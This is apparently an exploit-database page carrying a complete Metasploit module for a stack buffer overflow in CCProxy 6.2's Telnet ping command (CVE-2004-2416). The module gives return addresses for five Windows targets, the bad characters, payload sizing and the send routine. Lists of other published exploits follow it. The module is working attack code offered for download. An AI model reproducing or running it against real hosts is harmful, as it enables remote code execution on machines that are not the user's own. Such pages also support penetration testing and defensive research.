Menu

Search for hundreds of thousands of exploits

"CCProxy 6.2 - Telnet Proxy Ping Overflow (Metasploit)"

Author

Exploit author

"Patrick Webster"

Platform

Exploit platform

windows

Release date

Exploit published date

2007-09-03

Download file

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
##
# $Id: ccproxy_telnet_ping.rb 9179 2010-04-30 08:40:19Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = AverageRanking

	include Msf::Exploit::Remote::Tcp

	def initialize(info = {})
		super(update_info(info,
			'Name'		=> 'CCProxy <= v6.2 Telnet Proxy Ping Overflow',
			'Description'	=> %q{
					This module exploits the YoungZSoft CCProxy <= v6.2 suite
				Telnet service. The stack is overwritten when sending an overly
				long address to the 'ping' command.
			},
			'Author' 	=> [ 'Patrick Webster <patrick[at]aushack.com>' ],
			'Arch'		=> [ ARCH_X86 ],
			'License'       => MSF_LICENSE,
			'Version'       => '$Revision: 9179 $',
			'References'    =>
				[
					[ 'CVE', '2004-2416' ],
					[ 'OSVDB', '11593' ],
					[ 'BID', '11666 ' ],
					[ 'URL', 'http://milw0rm.com/exploits/621' ],
				],
			'Privileged'		=> false,
			'DefaultOptions'	=>
				{
					'EXITFUNC' 	=> 'thread',
				},
			'Payload' =>
				{
					'Space'		=> 1012,
					'BadChars' 	=> "\x00\x07\x08\x0a\x0d\x20",
				},
			'Platform' => ['win'],
			'Targets' =>
				[
					# Patrick - Tested OK 2007/08/19. W2K SP0, W2KSP4, XP SP0, XP SP2 EN.
					[ 'Windows 2000 Pro All - English', { 'Ret' => 0x75023411 } ], # call esi ws2help.dll
					[ 'Windows 2000 Pro All - Italian', { 'Ret' => 0x74fd2b81 } ], # call esi ws2help.dll
					[ 'Windows 2000 Pro All - French',  { 'Ret' => 0x74fa2b22 } ], # call esi ws2help.dll
					[ 'Windows XP SP0/1 - English',     { 'Ret' => 0x71aa1a97 } ], # call esi ws2help.dll
					[ 'Windows XP SP2 - English',	    { 'Ret' => 0x71aa1b22 } ], # call esi ws2help.dll
				],
			'DisclosureDate' => 'Nov 11 2004'))

		register_options(
			[
				Opt::RPORT(23),
			], self.class)
	end

	def check
		connect
		banner = sock.get_once(-1,3)
		disconnect

		if (banner =~ /CCProxy Telnet Service Ready/)
			return Exploit::CheckCode::Appears
		end
			return Exploit::CheckCode::Safe
	end

	def exploit
		connect

		sploit  = "p " + payload.encoded + [target['Ret']].pack('V') + make_nops(7)
		sock.put(sploit + "\r\n")

		handler
		disconnect
	end

end
Release Date Title Type Platform Author
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-12-02 "Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile" webapps multiple "Shahrukh Iqbal Mirza"
2020-12-02 "DotCMS 20.11 - Stored Cross-Site Scripting" webapps multiple "Hardik Solanki"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "ChurchCRM 4.2.0 - CSV/Formula Injection" webapps multiple "Mufaddal Masalawala"
2020-12-02 "NewsLister - Authenticated Persistent Cross-Site Scripting" webapps multiple "Emre Aslan"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
Release Date Title Type Platform Author
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
2020-12-02 "PRTG Network Monitor 20.4.63.1412 - 'maps' Stored XSS" webapps windows "Amin Rawah"
2020-12-02 "Microsoft Windows - Win32k Elevation of Privilege" local windows nu11secur1ty
2020-12-01 "Global Registration Service 1.0.0.3 - 'GREGsvc.exe' Unquoted Service Path" local windows "Emmanuel Lujan"
2020-12-01 "Pearson Vue VTS 2.3.1911 Installer - VUEApplicationWrapper Unquoted Service Path" local windows Jok3r
2020-12-01 "Intel(r) Management and Security Application 5.2 - User Notification Service Unquoted Service Path" local windows "Metin Yunus Kandemir"
2020-12-01 "10-Strike Network Inventory Explorer 8.65 - Buffer Overflow (SEH)" local windows Sectechs
2020-12-01 "EPSON Status Monitor 3 'EPSON_PM_RPCV4_06' - Unquoted Service Path" local windows SamAlucard
2020-11-30 "YATinyWinFTP - Denial of Service (PoC)" remote windows strider
Release Date Title Type Platform Author
2014-12-22 "Lotus Mail Encryption Server 2.1.0.1 (Protector for Mail) - Local File Inclusion / Remote Code Execution (Metasploit)" webapps php "Patrick Webster"
2014-12-19 "Varnish Cache CLI Interface - Remote Code Execution (Metasploit)" remote linux "Patrick Webster"
2011-07-20 "Cyberoam UTM - Multiple Cross-Site Scripting Vulnerabilities" webapps php "Patrick Webster"
2011-06-06 "Squiz Matrix 4 - 'colour_picker.php' Cross-Site Scripting" webapps php "Patrick Webster"
2011-05-02 "LANSA aXes Web Terminal TN5250 - 'axes_default.css' Cross-Site Scripting" webapps java "Patrick Webster"
2009-05-29 "SonicWALL SSL-VPN - 'cgi-bin/welcome/VirtualOffice' Remote Format String" remote hardware "Patrick Webster"
2009-04-02 "Asbru Web Content Management 6.5/6.6.9 - SQL Injection / Cross-Site Scripting" webapps asp "Patrick Webster"
2009-01-08 "PRTG Traffic Grapher 6.2.1 - 'url' Cross-Site Scripting" webapps java "Patrick Webster"
2008-04-07 "Tumbleweed SecureTransport 4.6.1 FileTransfer - ActiveX Buffer Overflow" remote windows "Patrick Webster"
2007-09-03 "CCProxy 6.2 - Telnet Proxy Ping Overflow (Metasploit)" remote windows "Patrick Webster"
2007-04-11 "webMethods Glue 6.5.1 Console - Directory Traversal" remote windows "Patrick Webster"
2006-09-22 "mysource 2.14.8/2.16 - Multiple Vulnerabilities" webapps php "Patrick Webster"
2006-09-22 "Google Mini Search Appliance 4.4.102.M.36 - Information Disclosure" webapps php "Patrick Webster"
2006-09-21 "CA eSCC r8/1.0 / eTrust Audit r8/1.5 - Arbitrary File Manipulation" remote windows "Patrick Webster"
2006-09-21 "CA eSCC r8/1.0 / eTrust Audit r8/1.5 - Web Server Full Path Disclosure" remote windows "Patrick Webster"
2006-09-21 "CA eSCC r8/1.0 / eTrust Audit r8/1.5 - Audit Event System Replay Attack" remote windows "Patrick Webster"
2005-08-09 "Apple Safari 1.3 Web Browser - JavaScript Invalid Address Denial of Service" dos osx "Patrick Webster" 
import requests
response = requests.get('http://127.0.0.1:8181?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Cipher Protocols Sigalg Trusted

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.

Host WAF detected